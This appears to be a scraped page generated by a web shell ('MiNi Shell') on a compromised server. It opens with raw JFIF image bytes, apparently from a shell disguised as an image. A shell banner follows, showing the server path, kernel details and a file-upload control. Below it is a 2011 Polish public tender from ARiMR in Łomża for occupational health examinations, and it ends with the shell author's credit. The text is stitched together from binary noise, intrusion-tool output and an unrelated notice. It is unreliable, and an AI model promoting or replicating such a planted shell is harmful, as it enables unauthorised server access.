JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110505/130249-N-2011.html

<p class="kh_header"><b>Łomża: Przedmiotem zamówienia jest świadczenie usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR.</b><br>
<b>Numer ogłoszenia: 130249 - 2011; data zamieszczenia: 05.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Nowa 2, 18-400 Łomża, woj. podlaskie, tel. 086 2156314, faks 086 2164513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest świadczenie usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR w oparciu o wymagania określone obowiązującymi przepisami prawa. 
2. Zakres badań profilaktycznych uwzględnia zagrożenia związane z:
a) obsługą monitorów ekranowych w wymiarze powyżej 4 godzin na dobę,
b) wykonywaniem wizytacji terenowych w zakładach beneficjentów, gospodarstwach rolników, przeglądami pól i lasów, innymi zadaniami w terenie, 
c) prowadzeniem pojazdów służbowych i przewozem innych osób,
d) wykonywaniem pracy umysłowej w pozycji siedzącej,
3. Wykonawca zobowiązany będzie przeprowadzić profilaktyczne badanie wstępne, okresowe i kontrolne na podstawie imiennego skierowania wystawionego przez Zamawiającego.
4. Wykonawca zobowiązany będzie do wystawienia stosownego zaświadczenia lekarskiego każdemu pracownikowi Zamawiającego po zakończeniu badań. 
5. Jeśli badanie okulistyczne w ramach badań profilaktycznych wykaże potrzebę używania okularów korekcyjnych do pracy z komputerem, lekarz medycyny pracy stwierdzi potrzebę ich stosowania przez pracownika zatrudnionego przy obsłudze monitora następującym w zaświadczeniu lekarskim zapisem konieczne używanie okularów korekcyjnych podczas pracy z monitorem ekranowym.
6. W sytuacji, gdy kolejne badania okresowe:
- wyznaczone terminem z ostatnich badań, na które pracownik uzyskał skierowanie i udał się do lekarza medycyny pracy z receptą, w oparciu o którą uprzednio nabył okulary do obsługi monitora ekranowego,
- spowodowane pogorszeniem się wzroku (stwierdzone badaniem okresowym tylko w zakresie konsultacji okulistycznej),
wykażą potrzebę zakupu nowych okularów korekcyjnych do pracy z monitorem ekranowym, to oprócz w/w zapisu na zaświadczeniu lekarskim wystawionym przez lekarza medycyny pracy musi być umieszczony dodatkowo zapis konieczna zmiana szkieł korekcyjnych do pracy z monitorem ekranowym,
7. W przypadku, gdy pracownik nie miał w zaświadczeniu lekarskim zalecenia pracy w szkłach korekcyjnych, a w okresie ważności jego badań pojawia się konieczność przeprowadzenia konsultacji okulistycznej spowodowanej pogorszeniem wzroku, pracodawca skieruje pracownika na badanie okresowe tylko w zakresie konsultacji okulistycznej. Wykonawca będzie wówczas zobowiązany do wystawienia stosownego zaświadczenia lekarskiego, w którym stwierdzi ewentualnie potrzebę używania okularów korekcyjnych zapisem konieczne używanie szkieł korekcyjnych podczas pracy z monitorem ekranowym.
8. Wykonawca zobowiązany będzie do wystawienia jednej faktury zbiorczej za usługi wykonane 
w danym miesiącu i dostarczanie jej do 5-tego dnia miesiąca następnego. Płatność będzie dokonywana z dołu za usługi faktycznie wykonane. Wykonawca zobowiązany będzie dołączyć do każdej faktury wykaz świadczonych usług według wzoru stanowiącego Załącznik nr 2 do wzoru Umowy (Załącznik nr 5A. 5B, 5C do Umowy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunku udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentów, o których mowa w Rozdziale IX Specyfikacji, wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunku udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentów, o których mowa w Rozdziale IX Specyfikacji, wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunku udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentów, o których mowa w Rozdziale IX Specyfikacji, wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunku udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentów, o których mowa w Rozdziale IX Specyfikacji, wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunku udziału w postępowaniu na podstawie analizy przedłożonych przez Wykonawcę oświadczeń i dokumentów, o których mowa w Rozdziale IX Specyfikacji, wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający nie wymaga przedłożenia innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Podlaski Oddział Regionalmny w Łomży, 18-400 Łomża, ul. Nowa 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2011 godzina 09:30, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa Podlaski Oddział Regionalmny w Łomży, 18-400 Łomża, ul. Nowa 2, pokój nr 112 lub nr 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zamówienia dotyczy:
a) świadczenia usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR na terenie miasta Łomża, w ilości:
- badania wstępne - 	80 ,
- badania okresowe - 	313,
- badania okresowe, tylko w zakresie badania konsultacji okulistycznej - 54 
- badania kontrolne - 	70,
Wskazane ilości badań są ilościami przewidywanymi, a ostateczne ilości poszczególnych badań będą wynikały z rzeczywistych potrzeb Zamawiającego.
b) Zapewnienia udziału lekarza w 8 posiedzeniach Komisji bezpieczeństwa i higieny pracy w trybie określonym w art. 23712 Kodeksu pracy.
c) Wykonania szczepień ochronnych  przeciwko kleszczowemu zapaleniu mózgu 36 pracownikom Zamawiającego, w tym:
- 35 szczepień pełnych (3 dawki),
- 1 szczepienie przypominające(1 dawka),
d) Przeprowadzenia badań sanitarno - epidemiologicznych w kierunku gruźlicy10 pracownikom Zamawiającego, wraz z wpisem do pracowniczej książeczki sanitarno - epidemiologicznej, związanych z wykonywaniem kontroli gospodarstw rolnych oraz zakładów przemysłu spożywczego, wymaganych na podstawie Rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 2 lutego 2006r. w sprawie badań sanitarno - epidemiologicznych pracowników (Dz.U. z 2006 r., Nr 25 poz. 191).
Do każdej części zamówienia odnoszą się zapisy rozdziału I Specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia dotyczy:
a) świadczenia usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR na terenie miasta Białystok, w ilości:
- badania wstępne - 	67,
- badania okresowe - 	232, 
- badania okresowe tylko w zakresie konsultacji okulistycznej - 37,
- badania kontrolne - 	65,
Wskazane ilości badań są ilościami przewidywanymi, a ostateczne ilości poszczególnych badań będą wynikały z rzeczywistych potrzeb Zamawiającego.
Do każdej części zamówienia odnoszą się zapisy rozdziału I Specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III zamówienia dotyczy:
a) świadczenia usług zdrowotnych w zakresie przeprowadzenia profilaktycznych badań wstępnych, okresowych i kontrolnych osób przyjmowanych do pracy i pracowników Podlaskiego Oddziału Regionalnego ARiMR na terenie miasta Suwałki, w ilości:
- badania wstępne - 	49,
- badania okresowe - 	74, 
- badania okresowe, tylko w zakresie konsultacji okulistycznej - 14,
- badania kontrolne - 	32,
Wskazane ilości badań są ilościami przewidywanymi, a ostateczne ilości poszczególnych badań będą wynikały z rzeczywistych potrzeb Zamawiającego.
Do każdej części zamówienia odnoszą się zapisy rozdziału I Specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com